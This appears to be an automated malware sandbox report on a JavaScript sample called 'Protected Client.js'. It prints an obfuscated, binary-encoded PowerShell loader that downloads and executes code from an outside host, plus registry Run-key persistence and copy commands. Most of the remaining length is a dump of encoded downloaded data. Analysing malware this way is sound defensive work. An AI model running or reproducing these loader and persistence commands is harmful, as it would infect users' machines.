1,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
cmdline	"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
cmdline	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_PingStatus where ((Address='google.com') And TimeToLive=80 And BufferSize=32)

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 9, 2021, 8 p.m.	show_type: 0 filepath_r: powershell parameters: $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf)) filepath: powershell	1	1
ShellExecuteExW Sept. 9, 2021, 8 p.m.	show_type: 0 filepath_r: cmd parameters: /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js" filepath: cmd	1	1
ShellExecuteExW Sept. 9, 2021, 8 p.m.	show_type: 0 filepath_r: cmd parameters: /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y filepath: cmd	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 9, 2021, 8 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: public, max-age=31536000 expires: Fri, 09 Sep 2022 11:00:48 GMT content-type: image/jpeg last-modified: Mon, 30 Aug 2021 22:12:00 GMT etag: "1fb27d-612d57b0-0;;;" accept-ranges: bytes content-length: 2077309 date: Thu, 09 Sep 2021 11:00:48 GMT server: LiteSpeed referrer-policy: no-referrer-when-downgrade
Data received	%42%36%30%33%41%35%44%46%44%41%39%31%35%30%32%36%38%39%32%43%34%41%32%38%44%44%45%45%31%32%31%30%33%35%39%35%42%43%34%42%33%44%39%32%35%42%42%39%32%44%36%46%41%41%38%44%46%39%43%42%32%35%34%46%31%33%46%37%44%36%36%42%42%38%43%31%38%38%37%30%44%32%41%30%33%2D%2D%31%43%35%42%35%35%35%45%45%35%45%41%39%36%43%43%41%43%30%37%42%43%34%41%44%34%36%32%34%38%34%30%33%30%46%44%46%30%33%44%37%41%44%38%30%35%38%42%36%30%43%36%46%31%33%43%44%34%38%46%46%44%33%37%31%34%36%33%37%42%31%44%31%45%44%43%43%44%46%32%36%39%33%31%41%30%33%35%43%41%41%46%36%41%33%39%36%38%37%33%46%34%30%36%42%32%31%39%2D%2D%36%41%46%31%42%37%34%35%34%32%39%31%35%37%41%30%36%45%38%39%33%41%35%39%37%41%32%43%43%33%32%33%37%39%38%42%44%46%45%31%36%37%44%38%45%30%44%36%46%31%45%38%46%42%31%46%36%37%33%33%41%45%42%33%32%31%30%36%31%43%33%33%31%38%46%38%46%36%44%30%43%41%44%43%41%30%34%33%33%41%30%35%37%35%34%36%31%44%39%33%36%44%41%36%31%36%45%37%42%36%42%36%34%37%42%31%31%33%33%33%31%39%30%41%30%45%32%37%33%30%39%35%42%33%45%38%36%35%41%41%37%42%32%42%37%41%45%46%32%46%38%39%36%43%39%42%34%36%35%36%39%43%38%31%32%42%39%45%44%41%35%44%42%34%44%34%44%35%35%42%38%38%38%31%32%36%36%44%33%38%35%43%35%41%32%45%30%39%42%46%42%34%37%42%32%33%38%35%39%30%32%31%42%43%46%33%41%31%42%46%30%35%42%37%35%42%35%35%41%45%42%44%44%41%35%45%30%46%42%35%43%37%31%36%41%32%32%35%35%31%30%34%42%31%34%37%32%34%38%35%39%33%43%35%42%2D%2D%33%31%34%33%34%39%45%34%35%45%41%46%39%38%37%37%43%45%32%31%39%41%3
Data received	6%41%37%39%34%37%35%46%33%44%44%35%43%39%41%33%39%30%44%30%33%36%44%44%43%35%41%46%35%33%35%30%34%34%30%36%38%38%30%32%39%39%37%31%32%44%43%45%43%34%41%34%35%43%46%41%46%42%41%36%42%41%34%44%31%30%31%37%37%39%30%37%33%32%41%46%32%34%43%43%43%39%45%34%42%46%44%45%43%46%36%30%35%36%33%33%45%36%32%42%46%36%30%36%31%46%43%41%37%38%45%42%46%41%35%32%42%42%36%44%45%30%41%30%39%33%32%30%39%39%34%41%46%37%44%34%44%32%41%45%41%31%43%43%34%46%30%44%34%33%32%39%38%43%45%32%34%44%35%31%31%38%41%38%39%30%36%32%30%41%44%42%41%41%38%41%41%41%41%36%45%34%45%34%42%43%36%32%37%45%45%35%38%45%44%43%37%43%42%35%32%38%41%44%34%39%31%37%37%30%33%45%38%34%33%45%33%45%33%43%30%45%39%46%35%46%43%41%35%33%35%39%36%41%45%38%42%34%39%39%39%37%34%45%36%34%30%37%42%37%31%39%43%46%35%44%41%44%44%39%42%32%37%38%38%43%45%38%43%34%33%39%35%44%36%46%46%43%36%44%31%39%31%38%45%43%44%38%36%33%35%31%32%46%31%44%44%45%46%30%41%33%31%45%42%30%38%43%41%35%31%38%46%43%38%36%34%43%34%36%34%46%35%38%43%42%37%43%38%36%32%44%33%39%42%46%36%39%41%44%46%32%39%33%38%33%31%38%43%45%43%37%43%45%39%36%42%31%45%38%46%38%46%33%43%42%39%42%37%30%34%33%34%42%37%2D%2D%33%44%35%39%46%30%44%38%31%42%33%33%32%39%46%44%39%43%42%31%32%35%46%30%32%32%34%37%39%43%39%43%39%37%44%41%43%33%46%32%33%46%37%42%34%45%46%43%39%41%31%41%33%31%46%39%30%32%46%42%42%41%46%46%32%36%32%43%46%33%33%35%41%44%45%39%39%32%36%42%31%38%38%31%46%34%36%46%44%35%44%45%37%31%30%38%45%46%33%42%45%44%38%43%32%32%31%44%33%41%46%37%37%38%37%42%34%33%30%38%42%33%30%38%42%44%39%41%35%46%44%30%45%46%42%41%45%35%36%37%37%31%36%34%32%30%35%36%35%31%30%43%35%31%37%41%32%41%44%46%37%44%35%46%38%37%34%33%32%44%44%35%46%44%35%35%39%37%35%43%45%34%42%37%36%31%37%38%31%34%32%43%36%34%38%35%41%35%44%32%44%36%31%37%45%45%36%38%41%35%34%30%38%46%42%41%37%42%42%32%31%37%35%31%30%33%39%44%38%44%33%42%32%32%30%32%35%39%45%30%39%45%42%39%30%45%31%35%46%43%38%46%44%36%32%34%38%43%30%32%41%30%39%33%31%41%43%41%34%41%44%34%44%30%35%32%39%42%38%44%37%36%33%39%42%44%37%33%45%32%43%33%46%34%45%33%45%30%38%32%44%45%31%44%36%44%41%33%43%30%37%45%39%41%43%35%31%33%36%33%37%43%45%45%41%45%37%33%35%36%39%42%30%34%42%44%32%43%35%35%36%41%33%31%38%42%41%36%38%33%43%31%46%39%31%44%35%31%39%30%37%30%39%44%30%39%45%34%31%30%44%31%35%41%32%45%44%43%39%36%36%30%32%42%33%34%34%38%37%44%38%35%46%37%35%35%43%32%31%43%35%44%31%44%33%34%33%30%33%41%34%36%45%39%36%32%42%31%33%42%41%32%44%44%34%41%34%44%38%30%39%46%30%41%32%36%35%39%45%43%33%46%35%31%38%31%44%41%32%44%38%43%42%34%34%31%31%34%37%30%45%33%45%43%43%33%38%43%34%42%44%46%44%36%32%38%31%43%45%41%36%31%35%35%31%33%43%45%31%44%32%36%39%32%41%44%34%33%30%36%32%37%37%35%46%31%41%37%46%39%41%34%45%38%46%46%44%41%42%43%32%37%37%30%42%34%38%33%38%46%41%43%38%39%36%38%32%35%45%45%31%43%39%34%44%34%38%31%37%36%34%38%41%38%32%43%37%43%38%31%42%46%39%36%41%32%43%37%41%36%34%42%42%39%43%42%36%30%38%31%34%45%35%39%43%35%43%34%39%38%44%44%43%39%30%31%43
Data received	%33%30%44%35%35%32%38%33%46%31%37%33%36%31%42%32%41%39%31%38%30%39%36%41%33%43%36%36%36%37%39%42%44%42%34%36%43%34%42%45%39%30%39%41%38%37%32%36%36%46%37%46%39%38%39%36%34%35%42%37%45%35%45%34%44%31%37%31%33%32%35%32%44%39%46%38%34%37%30%42%30%36%32%38%33%35%46%30%37%38%44%43%35%30%44%43%41%37%30%37%45%41%42%42%32%44%43%39%42%38%31%33%34%30%44%41%32%35%46%35%42%39%41%41%33%34%36%35%36%44%31%31%35%2D%2D%31%41%36%39%35%31%43%46%43%33%36%45%38%36%35%33%42%30%45%39%38%38%35%34%45%44%37%33%42%39%38%45%33%45%37%38%42%39%42%46%39%32%33%34%31%33%35%42%36%45%34%33%41%43%33%34%43%32%34%42%32%41%36%42%46%43%41%36%42%33%35%38%46%45%36%44%33%32%34%43%42%33%30%39%35%41%43%35%46%43%44%37%30%34%42%45%42%44%38%37%34%46%38%30%38%45%38%38%37%46%34%36%41%31%39%34%44%32%39%38%38%42%41%32%35%44%33%43%35%44%37%39%43%32%30%41%44%43%43%34%35%36%38%31%43%45%37%41%42%42%37%32%44%39%32%35%35%44%32%38%46%44%46%45%33%33%41%33%44%41%43%31%32%38%31%44%36%42%37%31%45%37%33%31%39%42%32%37%41%37%41%36%38%41%37%38%42%44%33%41%42%38%31%37%34%33%42%34%45%31%45%32%44%31%30%37%36%34%34%46%39%35%38%32%41%39%43%45%32%46%45%43%46%46%37%39%45%39%30%45%33%31%34%46%36%36%46%34%38%33%36%43%35%35%31%30%34%35%34%42%33%37%44%42%46%46%36%42%45%46%30%44%46%42%37%45%41%39%38%43%35%46%41%36%45%42%46%31%38%45%35%39%38%41%33%46%38%39%32%39%31%45%34%42%30%34%38%38%30%38%41%38%45%39%39%38%36%38%36%37%44%34%41%34%37%39%37%32%37%39%41%34%35%41%41%31%39%31%34%37%36%44%31%46%39%43%34%39%36%36%43%45%31%43%46%35%44%46%34%38%37%31%36%41%46%35%46%33%33%35%46%43%43%30%43%44%30%45%41%36%44%31%30%45%35%32%38%33%30%45%43%39%34%35%45%31%41%46%37%38%34%35%45%37%45%36%44%33%41%33%32%36%30%36%45%41%35%34%45%34%30%46%41%35%34%44%46%33%44%37%38%43%36%36%46%44%32%46%38%31%46%35%31%45%35%37%39%46%39%30%37%31%32%44%43%46%46%35%39%33%41%45%43%36%42%37%34%37%41%43%36%42%33%31%35%30%32%30%32%37%35%44%34%35%32%35%45%31%31%45%46%31%38%46%37%42%37%36%46%45%30%36%46%39%32%32%39%45%46%31%33%38%30%43%45%30%41%32%45%32%39%33%31%42%35%45%45%35%43%31%42%43%41%35%32%41%38%32%32%30%39%41%43%42%37%42%31%41%42%37%36%34%32%39%42%32%30%38%33%36%36%38%42%42%32%38%32%34%31%35%41%36%34%34%44%35%33%43%42%36%44%32%35%38%31%36%33%46%31%30%31%30%31%32%31%31%41%35%32%31%42%34%43%44%41%39%30%38%34%34%44%38%43%45%36%37%43%45%39%31%46%33%44%36%45%42%46%34%34%30%42%39%34%30%35%41%37%34%41%37%35%33%36%41%35%31%42%45%34%41%39%37%36%44%30%33%38%37%46%41%34%30%44%43%36%42%37%35%31%41%33%44%39%30%33%34%31%45%45%38%30%45%37%33%37%38%34%44%39%32%46%32%37%43%36%38%30%38%35%39%32%30%36%32%31%30%37%35%42%43%39%43%38%32%31%33%42%34%36%43%39%32%30%45%41%36%39%30%46%30%46%44%35%37%43%46%39%42%43%41%32%37%46%37%45%44%45%30%34%32%36%41%38%32%31%36%2D%2D%37%30%37%42%30%36%34%42%38%31%30%44%41%44%42%41%45%38%44%45%43%41%45%32%45%35%30%31%36%36%33%44%34%44%46%45%30%39%36%42%32%41%36%30%44%39%37%35%39%31%37%37%38%44%37%45%43%33%35%41%34%44%39%34%42%31%34%32%41%39%30%31%45%46%31%45%34%42%30%43%
Data received	33%44%39%45%38%41%31%36%41%33%30%36%44%33%37%38%38%45%45%33%31%36%41%41%36%32%46%31%30%33%31%31%37%46%35%35%35%37%43%32%36%33%34%45%32%43%46%45%41%36%35%38%46%43%32%46%35%34%39%30%37%38%39%41%35%41%41%33%33%39%32%46%31%36%45%46%38%43%43%35%37%46%38%43%46%38%37%46%44%33%34%30%36%38%45%45%38%46%46%33%39%39%32%31%41%33%43%39%31%35%45%31%33%42%30%32%35%38%36%34%35%32%30%32%31%37%42%44%36%43%31%32%38%31%42%39%41%30%37%43%44%30%35%42%30%46%33%42%34%43%36%45%42%37%44%43%39%41%45%46%45%39%38%34%31%34%30%39%43%44%42%42%32%31%32%46%44%34%35%39%31%42%42%44%39%44%30%44%31%42%36%30%44%37%36%31%42%38%37%33%35%30%32%44%33%43%44%31%33%36%37%36%31%31%45%32%43%30%44%37%35%43%46%42%32%37%30%36%31%39%34%44%30%34%37%42%37%38%37%35%45%32%37%35%30%41%44%45%46%30%31%45%34%35%35%43%39%39%41%44%32%38%36%31%42%46%42%38%33%34%38%42%33%45%42%37%38%42%31%32%46%38%31%36%38%41%46%42%46%30%39%39%32%46%37%36%30%45%33%33%46%30%41%37%34%31%35%31%46%31%42%35%44%43%35%46%44%33%39%45%34%42%36%44%35%33%38%46%45%41%32%46%33%38%31%45%42%42%35%32%35%31%46%34%42%44%44%37%36%36%44%41%41%41%39%37%46%31%43%30%37%38%31%36%32%45%45%46%34%42%43%36%37%42%31%34%46%31%35%43%36%46%35%44%43%41%36%32%34%37%35%38%44%46%35%39%42%45%32%36%31%44%30%45%33%31%46%42%36%42%45%45%45%37%34%37%42%31%31%46%37%44%32%41%43%43%36%45%44%45%46%37%46%46%38%39%44%43%37%31%38%46%35%32%43%34%30%33%37%37%36%39%44%41%38%42%45%39%30%35%34%41%45%36%43%35%30%35%43%41%35%33%39%37%31%37%32%38%33%44%42%33%45%35%32%46%39
Data received	32%30%38%45%33%30%45%42%44%43%38%43%34%31%31%43%37%39%31%36%43%34%32%30%34%43%44%36%35%37%46%30%33%42%34%33%35%46%37%39%36%38%37%43%44%42%43%31%42%44%30%34%44%32%39
Data received	%46%32%37%39%33%34%45%46%36%43%41%39%44%45%41%43%32%33%39%39%34%46%41%41%37%33%37%42%39%44%42%42%45%35%32%31%45%37%31%34%37%44%43%45%38%43%37%35%36%31%42%36%39%46%44%34%45%31%35%37%43%37%38%44%32%46%46%45%32%30%43%32%35%45%33%46%30%31%39%44%37%46%35%35%43%45%34%41%44%44%46%37%32%39%36%43%42%43%37%36%35%46%31%38%37%42%42%42%37%34%31%44%32%41%32%46%39%42%42%42%36%32%31%41%46%31%33%35%41%45%31%43%44%36%39%45%45%31%37%37%45%30%39%34%41%35%37%38%42%31%37%36%34%30%37%30%42%32%36%46%35%35%41%32%35%41%39%30%41%31%43%35%36%39%32%41%41%43%35%31%35%39%31%33%43%37%31%43%30%44%41%39%38%32%31%31%46%39%31%34%39%44%41%37%33%31%31%33%31%43%31%38%44%35%45%41%44%44%31%31%45%36%39%38%46%33%38%39%41%35%36%34%43%41%41%37%46%38%44%35%36%31%30%39%32%32%33%31%37%34%34%45%30%36%32%41%43%31%44%33%32%43%37%44%32%32%36%34%45%39%32%39%46%38%41%44%42%35%34%43%32%45%36%34%39%44%43%39%46%35%30%46%46%35%33%31%42%33%38%36%32%37%31%39%39%41%43%33%36%36%34%46%42%36%37%45%46%43%33%37%38%37%38%42%30%42%36%44%41%44%45%42%34%44%42%37%44%36%38%32%44%33%35%37%43%44%46%39%41%43%35%37%37%46%35%45%37%46%43%39%36%38%35%45%35%45%30%44%33%39%44%33%34%36%42%35%32%33%36%42%43%46%46%34%32%45%42%35%42%33%38%42%35%35%44%31%45%33%46%30%32%39%39%39%43%30%46%34%39%42%37%36%44%45%38%42%31%41%32%37%45%30%37%30%37%37%37%38%38%36%37%44%35%46%46%30%41%30%46%32%33%34%39%41%37%43%44%33%36%33%41%43%42%32%33%32%45%44%34%42%33%35%46%41%45%34%41%44%35%37%33%39%39%39%41%42%37%42%46%44%45%43%39%33%44%39%30%36%42%43%37%38%35%38%38%43%32%44%46%45%34%43%42%41%33%43%41%34%46%38%46%45%44%37%44%31%31%36%45%42%42%34%43%44%45%33%42%43%41%37%43%43%41%44%34%35%39%44%42%44%35%36%31%32%34%41%36%36%38%44%42%41%31%34%35%41%36%33%35%46%45%44%38%44%36%39%31%38%39%37%45%39%35%46%46%44%45%34%36%34%37%37%30%46%34%34%36%34%33%42%41%42%35%31%38%33%34%32%31%39%34%36%37%34%39%31%45%39%35%34%39%46%35%34%46%42%31%32%34%34%30%46%46%31%34%35%42%41%45%36%42%32%44%30%44%42%39%41%30%42%36%33%42%39%34%31%36%34%36%42%43%34%38%37%44%37%36%45%42%46%45%41%37%44%39%35%35%45%33%41%42%46%35%34%46%46%31%31%38%41%45%43%46%36%43%34%35%39%38%31%46%45%32%39%33%34%43%45%34%35%46%44%38%37%46%38%30%31%39%38%41%45%46%45%30%41%35%42%39%38%33%31%44%32%37%36%36%42%36%45%41%43%38%32%31%33%41%41%45%34%38%31%30%45%46%36%43%42%34%37%39%30%33%31%44%34%36%36%46%35%45%41%30%41%33%46%46%44%46%42%30%44%31%44%38%42%35%33%45%46%35%42%34%32%33%39%46%43%30%33%36%31%39%30%39%32%44%42%41%43%41%34%38%45%34%34%36%32%46%33%30%31%32%37%39%44%31%34%43%42%36%35%30%45%38%33%43%44%35%38%30%38%30%31%30%32%45%37%44%34%33%46%43%45%31%37%31%31%38%35%46%41%34%35%30%46%30%36%39%30%46%36%45%38%36%37%36%30%41%30%33%43%41%44%34%36%32%35%46%45%33%34%39%43%45%32%35%39%45%37%34%45%39%38%36%44%31%45%33%30%41%39%42%46%43%31%36%42%46%37%39%35%43%45%31%32%39%32%41%37%46%38%36%31%36%32%42%35%36%46%39%38%31%46%30%44%33%32%41%32%43%37%37%38%37%36%36%44%43%34%36%38%39%44%39%31%44%35%34%31%30%43%39%32%39%44%35%37%41%31%46%42%33%39%36%45%41%37%45%38%33%31%38%39%41%41%30%31%46%30%32%41%44%30%34%41%45%39%34%32%36%42%37%45%45%43%35%44%41%30%43%41%33%44%31%42%35%33%45%37%31%41%30%46%39%38%38%34%34%39%42%44%39%36%41%37%41%35%35%46%44%42%33%45%43%45%36%35%46%43%46%41%44%33%46%45%42%38%31%42%35%46%38%39%34%45%38%45%34%46%41%42%33%44%39%44%30%44%46%43%39%44%33%36%46%30%41%30%42%32%36%33%42%43%33%34%36%45%46%44%43%42%30%39%31%46%30%45%42%44%33%45%41%39%46%33%44%38%46%44%37%43%46%36%34%32%38%39%36%36%34%43%30%36%30%36%46%32%41%43%43%38%35%36%36%43%44%44%46%38%45%43%36%45%41%31%37%
Data received	34%32%37%42%32%34%39%37%34%33%32%42%41%39%36%38%34%39%41%42%39%45%34%30%39%34%34%33%37%36%36%35%44%30%34%39%45%33%42%45%37%31%37%33%46%34%32%42%33%43%44%32%34%42%46%39%45%46%35%43%38%43%37%37%31%45%38%44%42%37%37%45%31%46%45%45%30%38%32%41%34%37%34%30%36%36%36%43%41%37%39%33%41%46%46%46%43%37%41%43%45%37%39%34%34%41%33%32%44%46%41%31%32%34%45%35%43%36%44%44%42%46%31%32%30%39%33%46%41%35%35%33%32%34%42%45%38%35%31%35%31%35%37%44%32%31%39%36%43%43%37%42%45%35%42%42%43%34%41%46%35%30%46%33%44%38%33%46%41%43%33%46%46%45%41%35%42%31%44%32%37%46%41%33%44%32%46%31%45%35%31%38%42%41%32%32%30%43%44%44%41%35%31%38%42%41%43%39%42%42%46%46%33%37%42%41%41%34%44%43%33%39%42%45%39%41%42%44%34%34%45%46%43%37%41%46%38%30%36%35%34%43%32%41%41%32%38%35%35%37%37%45%37%45%35%38%35%44%32%44%45%46%31%43%43%42%33%36%30%37%34%37%37%33%41%35%31%46%30%41%36%44%44%34%38%31%43%42%38%43%36%37%45%31%35%33%46%33%31%31%33%44%37%33%44%36%37%36%30%45%35%37%34%31%33%44%37%30%31%39%46%41%46%32%31%32%45%41%43%31%36%38%31%45%46%36%34%45%36%32%37%37%32%41%31%33%39%30%46%46%33%43%44%38%39%38%35%32%46%44%39%44%35%41%46%46%41%43%38%41%37%45%42%30%38%36%39%36%45%43%30%31%46%39%41%33%31%38%31%31%46%43%41%33%33%38%36%30%41%32%43%35%30%44%41%33%41%42%46%31%37%42%36%33%43%33%32%38%39%34%41%43%41%32%35%37%33%37%38%43%43%32%34%36%32%45%39%41%44%46%33%2D%2D%41%37%39%35%32%33%34%41%46%36%31%31%34%37%36%33%44%35%31%37%46%43%33%45%38%39%46%34%36%35%35%43%30%32%45%41%43%36%30%46%44%42%43%43%38%41%37%45%32%41%45%43%38%30%44%45%41%39%36%45%34%42%35%43%37%42%31%43%33%39%45%44%32%41%33%35%41%30%42%30%46%36%30%33%41%41%32%46%42%39%37%37%38%37%41%44%35%44%32%45%38%31%31%45%35%37%42%34%30%31%45%45%35%38%38%35%44%46%41%30%41%39%38%34%32%41%42%43%37%41%35%44%38%34%45%31%39%43%36%42%46%42%43%36%36%32%46%46%37%37%39%44%38%32%42%30%46%43%38%41%37%36%31%36%32%33%34%31%38%39%46%35%35%37%46%33%36%35%37%39%46%34%31%45%46%38%31%35%45%32%45%33%30%43%44%44%45%37%46%30%46%43%38%46%39%41%46%37%31%36%38%42%31%39%41%38%39%31%32%30%35%31%46%42%43%35%46%41%34%39%44%37%35%35%35%30%45%35%35%46%33%39%44%42%46%35%45%30%36%34%46%39%33%41%43%43%34%30%38%43%35%37%41%41%46%46%43%45%30%37%35%46%42%36%45%38%32%37%36%42%38%46%33%44%35%44%43%39%39%38%31%34%36%42%34%32%32%31%45%34%41%46%46%45%37%37%38%39%43%37%43%32%41%34%30%33%41%45%45%43%31%32%41%38%37%36%34%31%36%35%46%41%32%46%38%46%42%31%31%30%42%39%45%30%45%36%35%31%35%39%46%42%42%41%30%43%38%38%45%41%41%42%35%44%39%45%37%44%30%36%32%33%46%45%33%35%39%39%34%41%45%41%37%34%32%35%41%41%46%41%37%43%32%31%39%46%45%33%42%30%44%36%36%43%33%31%39%34%34%42%38%41%34%45%35%46%31%33%35%44%34%39%31%45%30%32%42%41%30%39%31%41%32%38%45%46%35%36%42%30%39%43%35%45%36%36%30%41%32%41%39%30%31%45%32%30%43%45%42%37%36%38%